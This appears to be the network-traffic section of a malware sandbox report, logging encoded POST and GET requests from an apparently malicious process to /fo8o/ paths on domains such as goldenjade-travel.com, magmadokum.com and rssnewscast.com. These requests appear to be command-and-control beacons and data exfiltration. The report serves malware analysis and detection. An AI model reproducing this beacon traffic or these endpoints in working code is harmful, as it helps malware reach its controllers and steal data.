                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 2b 79 4d 67 4b 55 66 37 6c 6e 42 53 54 58 45 45 48 35 64 65 51 72 61 55 31 34 63 4a 5a 61 50 52 57 73 55 6b 58 34 3d
                                                                                          Data Ascii: UT5tTdKX=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO+yMgKUf7lnBSTXEEH5deQraU14cJZaPRWsUkX4=
Dec 19, 2024 07:51:01.531634092 CET | 492 | IN | HTTP/1.1 404 Not Found
                                                                                          Content-Type: text/html; charset=us-ascii
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Thu, 19 Dec 2024 06:51:00 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 315
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49806 | 116.50.37.244 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 07:51:02.732276917 CET | 824 | OUT | POST /fo8o/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en
    Accept-Encoding: gzip, deflate, br
    Host: www.goldenjade-travel.com
    Origin: http://www.goldenjade-travel.com
    Cache-Control: no-cache
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 229
    Referer: http://www.goldenjade-travel.com/fo8o/
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
    Data Ascii: UT5tTdKX=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwHiEmwrYp7mL18k6Asajw5+yexyx4RsrUrOpdD4
Dec 19, 2024 07:51:04.231998920 CET | 492 | IN | HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=us-ascii
    Server: Microsoft-HTTPAPI/2.0
    Date: Thu, 19 Dec 2024 06:51:03 GMT
    Connection: close
    Content-Length: 315
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49812 | 116.50.37.244 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 07:51:05.384725094 CET | 1841 | OUT | POST /fo8o/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en
    Accept-Encoding: gzip, deflate, br
    Host: www.goldenjade-travel.com
    Origin: http://www.goldenjade-travel.com
    Cache-Control: no-cache
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1245
    Referer: http://www.goldenjade-travel.com/fo8o/
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 19, 2024 07:51:06.890149117 CET | 492 | IN | HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=us-ascii
    Server: Microsoft-HTTPAPI/2.0
    Date: Thu, 19 Dec 2024 06:51:06 GMT
    Connection: close
    Content-Length: 315
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49819 | 116.50.37.244 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 07:51:08.038743973 CET | 530 | OUT | GET /fo8o/?sLRH=86fTArmPbL&UT5tTdKX=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en
    Host: www.goldenjade-travel.com
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 19, 2024 07:51:09.555674076 CET | 492 | IN | HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=us-ascii
    Server: Microsoft-HTTPAPI/2.0
    Date: Thu, 19 Dec 2024 06:51:09 GMT
    Connection: close
    Content-Length: 315
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49855 | 85.159.66.93 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 07:51:23.667551041 CET | 783 | OUT | POST /fo8o/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en
    Accept-Encoding: gzip, deflate, br
    Host: www.magmadokum.com
    Origin: http://www.magmadokum.com
    Cache-Control: no-cache
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 209
    Referer: http://www.magmadokum.com/fo8o/
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
    Data Ascii: UT5tTdKX=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0HCFYrM9aQu3VxcOQ8Ym9ZD2H2zFCD3grHkr4GM=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49864 | 85.159.66.93 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 07:51:26.321504116 CET | 803 | OUT | POST /fo8o/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en
    Accept-Encoding: gzip, deflate, br
    Host: www.magmadokum.com
    Origin: http://www.magmadokum.com
    Cache-Control: no-cache
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 229
    Referer: http://www.magmadokum.com/fo8o/
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
    Data Ascii: UT5tTdKX=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5vOXl7yTzWJxk0bmRYzt2iNswzCv50MMJz0dghg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49870 | 85.159.66.93 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 07:51:28.988245010 CET | 1820 | OUT | POST /fo8o/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en
    Accept-Encoding: gzip, deflate, br
    Host: www.magmadokum.com
    Origin: http://www.magmadokum.com
    Cache-Control: no-cache
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1245
    Referer: http://www.magmadokum.com/fo8o/
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49877 | 85.159.66.93 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 07:51:31.635165930 CET | 523 | OUT | GET /fo8o/?sLRH=86fTArmPbL&UT5tTdKX=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en
    Host: www.magmadokum.com
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 19, 2024 07:52:32.959995985 CET | 194 | IN | HTTP/1.0 504 Gateway Time-out
    Cache-Control: no-cache
    Connection: close
    Content-Type: text/html
    Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49985 | 91.195.240.94 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 07:52:38.389144897 CET | 786 | OUT | POST /fo8o/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en
    Accept-Encoding: gzip, deflate, br
    Host: www.rssnewscast.com
    Origin: http://www.rssnewscast.com
    Cache-Control: no-cache
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 209
    Referer: http://www.rssnewscast.com/fo8o/
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
    Data Ascii: UT5tTdKX=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pM8EeNV2qCYY2drGmwjRVhDanU4MZHXhXTBe0P0=
Dec 19, 2024 07:52:39.663331032 CET | 707 | IN | HTTP/1.1 405 Not Allowed
    date: Thu, 19 Dec 2024 06:52:39 GMT
    content-type: text/html
    content-length: 556
    server: Parking/1.0
    connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          10 | 192.168.2.5 | 49986 | 91.195.240.94 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 19, 2024 07:52:41.041213036 CET | 806 | OUT | POST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.rssnewscast.com
                                                                                          Origin: http://www.rssnewscast.com
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 229
                                                                                          Referer: http://www.rssnewscast.com/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 76 69 33 48 77 37 49 33 32 49 4e 77 52 75 71 59 69 72 31 39 44 73 35 46 2f 48 61 6e 6e 55 34 52 42 43 41 4a 64 66
                                                                                          Data Ascii: UT5tTdKX=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBvi3Hw7I32INwRuqYir19Ds5F/HannU4RBCAJdf
                                                                                          Dec 19, 2024 07:52:42.316906929 CET | 707 | IN | HTTP/1.1 405 Not Allowed
                                                                                          date: Thu, 19 Dec 2024 06:52:42 GMT
                                                                                          content-type: text/html
                                                                                          content-length: 556
                                                                                          server: Parking/1.0
                                                                                          connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          11 | 192.168.2.5 | 49987 | 91.195.240.94 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 19, 2024 07:52:43.697117090 CET | 1823 | OUT | POST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.rssnewscast.com
                                                                                          Origin: http://www.rssnewscast.com
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 1245
                                                                                          Referer: http://www.rssnewscast.com/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 59 42 31 64 62 75 6d 7a 4c 67 61 41 33 54 2f 58 6f 6d 65 44 6d 76 4b 79 68 45 33 61 76 52 31 66 53 45 79 67 58 6e 59 6b 47 6d 6c 67 4e 56 51 65 68 4f 31 36 35 63 4f 37 32 6c 69 68 4e 46 4c 78 6b 59 43 6a 56 6b 52 78 4d 79 6c 4c 70 48 69 2f 7a 71 65 4a 48 49 31 64 75 30 31 42 36 61 46 56 45 43 2b 47 4b 39 57 4a 55 36 67 59 4a 55 50 65 63 43 6a 7a 4b 39 73 77 44 57 61 79 62 38 5a 6d 48 5a 65 4a 2f 34 4f 53 53 44 72 58 4f 71 52 44 79 73 57 66 4e 33 69 72 64 62 46 68 52 78 48 [TRUNCATED]
                                                                                          Data Ascii: UT5tTdKX= [TRUNCATED]
                                                                                          Dec 19, 2024 07:52:44.972100973 CET | 707 | IN | HTTP/1.1 405 Not Allowed
                                                                                          date: Thu, 19 Dec 2024 06:52:44 GMT
                                                                                          content-type: text/html
                                                                                          content-length: 556
                                                                                          server: Parking/1.0
                                                                                          connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          12 | 192.168.2.5 | 49988 | 91.195.240.94 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 19, 2024 07:52:46.354913950 CET | 524 | OUT | GET /fo8o/?UT5tTdKX=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&sLRH=86fTArmPbL HTTP/1.1
